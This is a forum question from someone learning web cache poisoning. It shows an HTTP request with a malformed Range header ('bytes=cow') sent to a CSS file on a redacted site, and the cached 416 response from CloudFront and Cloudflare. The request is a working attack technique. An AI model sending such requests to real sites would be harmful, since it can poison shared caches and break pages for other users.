# Is this web cache poisoning attempt correct?

Tags: web-application, dns, web-service, cdn

So i've been trying to learn cache poisoning for a while and today i thought i finally found a vulnerable instance. Everything seems to be working even tho it doesn't. Like, 416 response is cached, age is 64. But when i visit it on the browser it's normal. I cleared the browser cache, tried different cache busters, nothing works.

Request

```
GET /static/css/main.XXX.css?cache=6 HTTP/2
Host: www.xxx.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Cache-Control: max-age=0
Range: bytes=cow
```

Response:

```
HTTP/2 416 Requested Range Not Satisfiable
Date: Thu, 27 Apr 2023 14:37:41 GMT
Content-Type: text/html
X-Amz-Server-Side-Encryption: AES256
X-Amz-Version-Id: D4RoIF1vo09od9boO4mfVw.TF.MK5q9h
X-Cache: RefreshHit from cloudfront
Via: 1.1 485f9ba85555555555555.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: VIE50-C2
X-Amz-Cf-Id: afsiRqeRfGy4bEhasfiqldtgfghffg402T_aRIBHv_eamnMglu0x2Mah__Q==
X-Frame-Options: SAMEORIGIN
Age: 64
Expires: Thu, 27 Apr 2023 18:37:41 GMT
Cache-Control: public, max-age=14400
Content-Range: bytes */280
Cf-Cache-Status: HIT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
Server: cloudflare
Cf-Ray: 767afsfasfa505189-IST

<html>
<head><title>416 Requested Range Not Satisfiable</title></head>
<body bgcolor="white">
<center><h1>416 Requested Range Not Satisfiable</h1></center>
<hr><center>cloudflare-nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
```